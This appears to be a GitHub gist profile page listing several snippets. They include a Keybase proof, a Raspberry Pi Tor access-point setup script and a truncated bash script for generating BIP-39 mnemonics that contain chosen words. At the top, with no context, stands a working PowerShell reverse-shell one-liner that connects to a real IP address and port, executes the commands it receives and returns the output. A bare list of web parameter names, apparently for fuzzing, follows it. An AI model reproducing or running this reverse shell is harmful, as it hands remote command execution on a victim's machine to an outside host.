Skip to content

Instantly share code, notes, and snippets.

View turcane's full-sized avatar

Ediz Turcan turcane

  • adesso SE
  • Germany
View GitHub Profile
$sm=(New-Object Net.Sockets.TCPClient("167.172.173.182",4337)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}
admin
administration
db
promote
maxaddr
allow_rating
GiftAid
installGoingOn
logo
editlink

Keybase proof

I hereby claim:

  • I am turcane on github.
  • I am wed (https://keybase.io/wed) on keybase.
  • I have a public key ASDZOsHtQJBkeyuw7ge0Va-H-j2hYQpIN6jEmRl_KE-B8Ao

To claim this, I am signing this object:

@turcane
turcane / Raspberry Pi Tor Access Point.sh
Created July 21, 2019 19:44
Raspberry Pi Tor Access Point
# Tested on Rasperry 3B+ with Raspbian Buster (2019-07-10)
# Sources:
# 1. https://3os.org/raspberryPi/TOR-Pi/
# 2. https://jankarres.de/2013/12/raspberry-pi-tor-wlan-hotspotaccess-point/
sudo apt-get update && sudo apt-get upgrade -y && sudo apt-get install git vim monit htop vnstat -y
git clone https://github.com/unixabg/RPI-Wireless-Hotspot.git
cd RPI-Wireless-Hotspot
sudo ./install
@turcane
turcane / vanity_mnemonic.sh
Last active February 28, 2020 09:52
Vanity Mnemonic
#!/bin/bash
# https://github.com/trezor/python-mnemonic Klonen oder downloaden und dieses script in den Hauptordner legen
# Mit 'tail -f mnemonics.txt' kann man live die generierten mnemonics beobachten
# Anzahl der zu generierenden Mnemonics (hier 10)
for i in `seq 1 10`; do
mnemonic=$(python3 -c 'from mnemonic import Mnemonic; m = Mnemonic("english"); print(m.generate(strength=256))')
# Kann beliebig fortgesetzt werden mit " || [[ ${mnemonic} != *"wordN"* ]]" VOR dem Semikolon
# Wörterliste https://github.com/bitcoin/bips/blob/master/bip-0039/english.txt